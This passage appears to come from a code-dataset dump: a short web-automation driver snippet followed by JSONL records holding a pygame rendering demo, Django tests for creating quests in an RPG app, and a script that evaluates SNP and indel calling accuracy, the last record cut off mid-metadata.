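# Hypothetical driver script; LoginAction is an assumed action class.
handler = StrikerdotHandler()
handler.add_action(LoginAction)   # registered under the action's .name, e.g. 'Login'
handler.home()                    # navigate to url_home, then wait nav_time seconds
handler.login()                   # runs the registered login action, if any
print(handler.is_logged_in)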
+{"seq_id": "508619205", "text": "import pygame\nimport math\nimport numpy\n \nclass game:\n def __init__(self):\n self.running = True\n self.size = self.width, self.height = 1280, 720\n self.screen = pygame.display.set_mode(self.size)\n self.bg = (192,192,192)\n\n self.square = [[1,2],[1,4],[-1,4],[-1,2]]\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self.running = False\n \n elif event.type == pygame.KEYDOWN:\n if event.unicode == \"w\":\n for point in self.square:\n point[1] -= 0.01\n elif event.unicode == \"s\":\n for point in self.square:\n point[1] += 0.01\n elif event.unicode == \"d\":\n for point in self.square:\n point[0] -= 0.01\n elif event.unicode == \"a\":\n for point in self.square:\n point[0] += 0.01\n\n elif event.key == pygame.K_ESCAPE:\n self.running = False\n \n elif event.type == pygame.MOUSEMOTION:\n mdir = pygame.mouse.get_rel()[0]\n if mdir > 0:\n for point in self.square:\n temp = point[0]*math.cos(0.01) - (point[1])*math.sin(0.01)\n point[1] = point[0]*math.sin(0.01) + (point[1])*math.cos(0.01)\n point[0] = temp\n elif mdir < 0:\n for point in self.square:\n temp = point[0]*math.cos(-0.01) - (point[1])*math.sin(-0.01)\n point[1] = point[0]*math.sin(-0.01) + (point[1])*math.cos(-0.01)\n point[0] = temp\n\n def loop(self):\n self.screen.fill(self.bg)\n vertex = []\n \n for edge in self.square:\n xpos = self.width/2 + math.atan(edge[0]/edge[1])*2*self.width/math.pi\n hpos = math.atan(1/(edge[0]**2+edge[1]**2)**0.5)*2*self.height/math.pi\n mid = self.height/2\n vertex += [[xpos,mid+hpos],[xpos,mid-hpos]]\n\n vs = len(vertex)\n \n dist = []\n for i in range(0,4):\n dist_x = (self.square[i][0] + self.square[(i+1)%4][0])/2\n dist_y = (self.square[i][1] + self.square[(i+1)%4][1])/2\n dist += [(dist_x**2 + dist_y**2)**0.5]\n\n dist = numpy.argsort(numpy.array(dist))\n \n for i in (2*dist[::-1]):\n if i%4 == 0:\n pygame.draw.polygon(self.screen, [128,128,128], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n else:\n pygame.draw.polygon(self.screen, [96,96,96], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n \n def execute(self):\n pygame.init()\n pygame.event.set_grab(True)\n pygame.key.set_repeat(1,1)\n pygame.mouse.set_visible(False)\n \n while self.running:\n for event in pygame.event.get():\n self.on_event(event)\n \n self.loop()\n pygame.display.flip()\n \n pygame.quit()\n\nkeal = game()\nkeal.execute()\n", "sub_path": "input_demo.py", "file_name": "input_demo.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 36, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", 
"line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 54, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.draw.polygon", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.event.set_grab", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "214926306", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests process for creating a quest.\n\"\"\"\nfrom braces.views import LoginRequiredMixin\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import CreateView\nfrom mock import patch, PropertyMock\nfrom characters.mixins import NoAvailableCharactersMixin\nfrom characters.models import Character\nfrom characters.tests.utils import CharacterUtils\nfrom characters.views import CharacterListView\nfrom quests.models import Quest, Post\nfrom rpg_auth.tests.utils import CreateUserMixin\nfrom world.mixins import LocationFromRequestMixin\nfrom world.models import Location\nfrom world.views import ContinentListView\n\n\nclass SelectLocationTestCase(CreateUserMixin):\n \"\"\"\n Tests that users can create quests\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectLocationTestCase, self).setUp()\n self.character_1 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_location_renders(self):\n \"\"\"\n A view must exist allowing a user to select a location to quest in.\n \"\"\"\n response = self.client.get(reverse('quests:select_location'))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, ContinentListView))\n self.assertTemplateUsed(response, 'quests/select_location.html')\n\n def test_user_must_be_logged_in_to_select_location(self):\n \"\"\"\n A user must be logged in to select the location of a quest.\n \"\"\"\n self.client.logout()\n response = self.client.get(reverse('quests:select_location'))\n self.assertRedirects(response, '{0}?next={1}'.format(\n reverse('rpg_auth:login'), reverse('quests:select_location')\n ))\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_available_characters.return_value.count.return_value = 0\n response = self.client.get(reverse('quests:select_location'))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass SelectCharacterTestCase(CreateUserMixin):\n \"\"\"\n Tests that if the user has selected a location they can also select a character.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectCharacterTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_character_renders(self):\n \"\"\"\n Tests that given a valid location, a user's characters are listed.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CharacterListView))\n self.assertTemplateUsed(response, 'quests/select_character.html')\n self.assertEquals(response.context['location'], self.location_1)\n\n def test_invalid_location_gives_404(self):\n \"\"\"\n Tests if an invalid location is given a 404 is raised.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': 'fake-slug'}))\n self.assertEquals(response.status_code, 404)\n\n 
@patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_object_list_is_only_available_characters(self, patched_available_characters):\n \"\"\"\n The object list should only contain characters that are available.\n \"\"\"\n available_characters = Character.objects.filter(pk=1)\n patched_available_characters.return_value = available_characters\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.context['object_list'], available_characters)\n self.assertTrue(self.character_2 not in response.context['object_list'])\n\n @patch('characters.models.CharacterProfile.has_available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_has_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_has_available_characters.return_value = False\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass CreateQuestTestCase(CreateUserMixin):\n \"\"\"\n Tests that a quest can be created once a user has selected the location and the character to start.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(CreateQuestTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_create_view_renders(self):\n \"\"\"\n The view to create a quest should render.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n )\n )\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CreateView))\n self.assertTrue(issubclass(response.context['view'].__class__, NoAvailableCharactersMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LocationFromRequestMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LoginRequiredMixin))\n self.assertTemplateUsed(response, 'quests/quest_form.html')\n self.assertEquals(response.context['location'], self.location_1)\n self.assertEquals(response.context['character'], self.character_1)\n self.assertEquals(len(response.context['form'].fields), 3)\n\n self.assertIsInstance(response.context['form'].fields['title'], forms.CharField)\n self.assertTrue(response.context['form'].fields['title'].required)\n\n self.assertIsInstance(response.context['form'].fields['description'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['description'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['description'].required)\n\n self.assertIsInstance(response.context['form'].fields['first_post'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['first_post'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['first_post'].required)\n\n def test_invalid_character_gives_404(self):\n \"\"\"\n If an invalid PK is provided for a character a 404 error is returned.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': 999},\n )\n )\n 
self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_unavailable_character_gives_404(self, patched_available_characters):\n \"\"\"\n If another user's character is provided then a 404 should be raised.\n \"\"\"\n patched_available_characters.return_value = Character.objects.filter(pk=self.character_1.pk)\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_2.pk},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n def test_quests_have_initialise_method(self):\n \"\"\"\n Quests should have an initialise method that sets the character, location\n and the GM.\n \"\"\"\n quest = Quest(title=u'Title', description=u'description')\n quest.initialise(\n gm=self.user.quest_profile,\n first_post=u'first post',\n location=self.location_1,\n character=self.character_1,\n )\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n\n def test_creating_a_quest_sets_first_post_characters_and_location(self):\n \"\"\"\n When a quest is created the logged in user should be set as the GM.\n \"\"\"\n valid_data = {\n 'title': u'Title 1',\n 'description': u'Description 1',\n 'first_post': u'first post',\n }\n response = self.client.post(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n ),\n data=valid_data,\n follow=True,\n )\n quest = Quest.objects.get(pk=1)\n self.assertRedirects(response, quest.get_absolute_url())\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(quest, post.quest)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n message = list(response.context['messages'])[0]\n self.assertEqual('{0} has begun!'.format(u'Title 1'), unicode(message.message))\n self.assertTrue('success' in message.tags)\n\n\nclass QuestDetailViewTestCase(CreateUserMixin):\n \"\"\"\n Tests that there is a detail view for quests.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def test_detail_view_renders(self):\n \"\"\"\n It should be possible to view a quest.\n \"\"\"\n quest = Quest.objects.create(\n title=u'title', description=u'description', slug=u'slug', gm=self.user.quest_profile\n )\n response = self.client.get(reverse('quests:quest_detail', kwargs={'slug': quest.slug},))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.context['object'], quest)\n", "sub_path": "quests/tests/test_create_quests.py", "file_name": "test_create_quests.py", "file_ext": "py", "file_size_in_byte": 11072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 29, "usage_type": "call"}, {"api_name": 
"characters.tests.utils.CharacterUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "world.views.ContinentListView", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 50, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 68, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 69, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 69, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 70, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "characters.views.CharacterListView", "line_number": 78, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 86, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 94, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 89, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 100, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 100, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 110, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 118, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 119, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 119, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 120, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 133, "usage_type": "argument"}, {"api_name": "characters.mixins.NoAvailableCharactersMixin", "line_number": 
134, "usage_type": "argument"}, {"api_name": "world.mixins.LocationFromRequestMixin", "line_number": 135, "usage_type": "argument"}, {"api_name": "braces.views.LoginRequiredMixin", "line_number": 136, "usage_type": "argument"}, {"api_name": "django.forms.CharField", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 142, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 145, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 149, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 150, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 158, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 172, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 165, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 165, "usage_type": "name"}, {"api_name": "quests.models.Quest", "line_number": 184, "usage_type": "call"}, {"api_name": "quests.models.Post.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 194, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 209, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects.get", "line_number": 216, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 216, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 216, "usage_type": "name"}, {"api_name": "quests.models.Post.objects.get", "line_number": 221, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 221, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "quests.models.Quest.objects.create", "line_number": 241, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 241, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 241, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 244, "usage_type": "call"}]}
+{"seq_id": "468508638", "text": "import os\nimport sys\nimport json\nfrom datetime import datetime\n\nconfig_file = open(sys.argv[1])\ndata = json.load(config_file)\nconfig_file.close()\n\nprog_version = data[\"ProgVer\"]\nprog_path = data[\"ProgPath\"]\ndata_dir = data[\"DataPath\"][\"DataDir\"]\nref_dir = data[\"DataPath\"][\"RefDir\"]\ngenome_fn = data[\"DataPath\"][\"GenomeFile\"]\nsnp_fn = data[\"DataPath\"][\"SNPProfFile\"]\nread_dir = data[\"DataPath\"][\"ReadDir\"]\nindex_dir = data[\"DataPath\"][\"IndexDir\"]\nresult_dir = data[\"DataPath\"][\"ResultDir\"]\nread_fn = data[\"DataPath\"][\"ReadPrefixFile\"]\n\nconfi = float(sys.argv[2])\ncpu_num = sys.argv[3]\ncov_num = sys.argv[4]\nresult_dn = sys.argv[5]\n\nref_path = os.path.join(data_dir, ref_dir)\nread_path = os.path.join(data_dir, read_dir)\n\ngenome_file = os.path.join(ref_path, genome_fn)\nsnp_file = os.path.join(ref_path, snp_fn)\n\nref_len = 249250621\nref_para = ['0.70', '0.75', '0.80', '0.85', '0.90', '0.95', '0.96', '0.97', '0.98', '0.99']\nread_lens = [100]\nseq_errs = ['0.00015-0.0015']\nmax_snum = [2**i for i in range(3, 14)]\nread_nums = []\nif cov_num == \"all\":\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25]]\nelse:\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [int(cov_num)]]\n\nfor para in ref_para[0:1]:\n\n true_snp_comp, true_indel_comp, true_snp_none, true_indel_none = {}, {}, {}, {}\n variant_comp_file = os.path.join(ref_path, \"variant_comp_\" + para + \".txt\")\n variant_none_file = os.path.join(ref_path, \"variant_none_\" + para + \".txt\")\n\n with open(variant_comp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_comp[int(value[0])] = value[1]\n else:\n true_indel_comp[int(value[0])] = value[1]\n\n with open(variant_none_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_none[int(value[0])] = value[1]\n else:\n true_indel_none[int(value[0])] = value[1]\n\n KAKS, NS = len(true_snp_comp), len(true_snp_none)\n KAKID, NID = len(true_indel_comp), len(true_indel_none)\n\n result_path = os.path.join(data_dir, result_dir, \"isc_\" + para, result_dn)\n result_file_path = result_path + \"/\" + read_fn + \"_\" + str(read_lens[0]) + \".\" + str(seq_errs[0]) + \".prec-rec-time-mem.\" + str(confi) + \".all-pos.txt\"\n result_file = open(result_file_path, \"w\")\n\n header = [\"Alg\", \"cov\", \"qual\", \\\n \"S\", \"P-S\", \"R-S\", \"FP\", \"TP\", \"FP-S@Other\", \"P-S@None\", \"R-S@None\", \"P-S@Comp\", \"R-S@Comp\", \\\n \"I\", \"P-I\", \"R-I\", \"FP-I@Other\", \"P-I@None\", \"R-I@None\", \"P-I@Comp\", \"R-I@Comp\", \\\n \"S@None\", \"TP-S@None\", \"FP-S@None\", \"S@Comp\", \"TP-S@Comp\", \"FP-S@Comp\", \\\n \"I@None\", \"TP-I@None\", \"FP-I@None\", \"I@Comp\", \"TP-I@Comp\", \"FP-I@Comp\", \\\n \"run\", \"read\", \"proc\", \"max_snum\", \"max_ps_num\", \"na_num\", \"na_ratio\", \\\n \"timeI\", \"memI\", \"timeC\", \"memC\", \"input_para\", \"para\"]\n\n result_file.write(\"\\t\".join(header))\n result_file.write(\"\\n\")\n\n for rl in read_lens:\n for err in seq_errs:\n for rn in read_nums:\n for ms in max_snum[6:7]:\n prefix_fn = read_fn + \"_\" + str(rl) + \".\" + str(err) + \".\" + str(rn) + \".\" + str(ms)\n called_snp_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".vcf\")\n snp = {}\n with open(called_snp_file) as f:\n for 
line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[2]) >= 1 and float(value[2]) >= confi:\n snp[int(value[0]) - 1] = value[1]\n\n result_file.write(\"\\t\".join([prog_version, \"%.0f\" % (2.0*int(rn)*int(rl)/ref_len), str(confi)]) + \"\\t\")\n\n TP_KAKS, TP_NS = 0, 0\n FP_KAKS, FP_NS = 0, 0\n TP_KAKID, TP_NID = 0, 0\n FP_KAKID, FP_NID = 0, 0\n FP_S, FP_ID = 0, 0\n for key, value in snp.iteritems():\n if key in true_snp_comp or key in true_indel_comp:\n if key in true_snp_comp:\n if value == true_snp_comp[key]:\n TP_KAKS += 1\n else:\n FP_KAKS += 1\n elif key in true_indel_comp:\n if value == true_indel_comp[key]:\n TP_KAKID += 1\n else:\n FP_KAKID += 1\n elif key in true_snp_none or key in true_indel_none:\n if key in true_snp_none:\n if value == true_snp_none[key]:\n TP_NS += 1\n else:\n FP_NS += 1\n elif key in true_indel_none:\n if value == true_indel_none[key]:\n TP_NID += 1\n else:\n FP_NID += 1\n else:\n if len(value) == 1:\n FP_S += 1\n else:\n FP_ID += 1\n\n result_file.write(str(KAKS + NS) + \"\\t\")\n if TP_KAKS + FP_KAKS + TP_NS + FP_NS + FP_S != 0 and KAKS + NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(TP_KAKS + TP_NS + FP_KAKS + FP_NS + FP_S)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(KAKS + NS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(\"%.5d\\t\" % (FP_KAKS + FP_NS + FP_S))\n result_file.write(\"%.5d\\t\" % (TP_KAKS + TP_NS))\n\n result_file.write(str(FP_S) + \"\\t\")\n if TP_NS + FP_NS != 0 and NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(TP_NS + FP_NS)))\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(NS)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKS + FP_KAKS != 0 and KAKS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(TP_KAKS + FP_KAKS)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(KAKS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(KAKID + NID) + \"\\t\")\n if TP_KAKID + FP_KAKID + TP_NID + FP_NID + FP_ID != 0 and KAKID + NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(TP_KAKID + TP_NID + FP_KAKID + FP_NID + FP_ID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(KAKID + NID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(FP_ID) + \"\\t\")\n if TP_NID + FP_NID != 0 and NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(TP_NID + FP_NID)))\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(NID)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKID + FP_KAKID != 0 and KAKID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(TP_KAKID + FP_KAKID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(KAKID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(NS) + \"\\t\" + str(TP_NS) + \"\\t\" + str(FP_NS) + \"\\t\")\n result_file.write(str(KAKS) + \"\\t\" + str(TP_KAKS) + \"\\t\" + str(FP_KAKS) + \"\\t\")\n\n result_file.write(str(NID) + \"\\t\" + str(TP_NID) + \"\\t\" + str(FP_NID) + \"\\t\")\n result_file.write(str(KAKID) + \"\\t\" + str(TP_KAKID) + \"\\t\" + str(FP_KAKID) + \"\\t\")\n\n result_file.write(result_dn + \"\\t\" + prefix_fn + \"\\t\" + cpu_num + \"\\t\" + str(ms) + \"\\t1\\t\")\n\n mem_time_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".log\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"# of no-aligned reads\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n 
result_file.write(str((1-float(tokens[1]))/rn) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"time for initializing SNP caller\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after initializing SNP caller\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n if \"time for calling SNPs\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after calling SNPs\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"Input parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"Parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(\"\\n\")\n\nresult_file.close()\n", "sub_path": "ivc-tools/old-test-scripts/0.5-test-scripts/isc-test-dwgsim-eval-all-pos.py", "file_name": "isc-test-dwgsim-eval-all-pos.py", "file_ext": "py", "file_size_in_byte": 10449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", 